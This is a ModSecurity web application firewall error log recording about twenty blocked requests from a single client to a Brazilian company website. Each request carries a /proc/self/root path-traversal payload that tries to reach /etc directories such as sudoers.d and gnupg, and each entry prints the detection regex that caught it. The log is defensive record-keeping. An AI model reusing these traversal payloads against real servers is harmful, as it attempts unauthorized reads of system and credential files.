[Mon Mar 16 13:47:13.797408 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:40996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0Ef9ocpUE4ed4uDz0iAAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:17.206295 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:41002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0FdSswJuvopo3lOhkngAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:19.616236 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.243.203:41018] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0F1ajLEzk2WiQ-10XPQAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:20.947078 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.243.203:55286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0GP9ocpUE4ed4uDz0kgAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:23.242959 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.243.203:55292] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0Gpqj1wV0Si-Okef0xQAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:24.656265 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.243.203:55306] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0HKTCbgAP5jq5TegwZwAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:27.091325 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:55318] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0H9SswJuvopo3lOhkoAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:28.425402 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:55330] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0INSswJuvopo3lOhkoQAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:29.639744 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.243.203:55334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0IVajLEzk2WiQ-10XQAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:32.010229 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:45094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0JLABkC4fWIHEf8HyqQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:35.388059 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:45104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0J_9ocpUE4ed4uDz0mQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:36.730633 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:45106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0KP9ocpUE4ed4uDz0mgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:37.868350 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:45120] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0KbABkC4fWIHEf8HysgAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:39.159147 2026] [:error] [pid 21806:tid 140411666392832] [client 74.7.243.203:45122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0K9SswJuvopo3lOhkpQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:40.468077 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:37848] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0LP9ocpUE4ed4uDz0mwAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:41.864628 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:37858] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0LaTCbgAP5jq5TegwaQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:44.362982 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:37874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0MP9ocpUE4ed4uDz0ngAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:45.691762 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:37888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0Mf9ocpUE4ed4uDz0oQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:50.584070 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.243.203:37904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0NlajLEzk2WiQ-10XSgAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:51.885776 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:45172] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0N7ABkC4fWIHEf8HyzwAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:53.031210 2026] [:error] [pid 15061:tid 140411725141760] [client 74.7.243.203:45178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0OaTCbgAP5jq5TegwbAAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:47:54.228150 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:45192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg0Ov9ocpUE4ed4uDz0pAAAAhU"], referer: 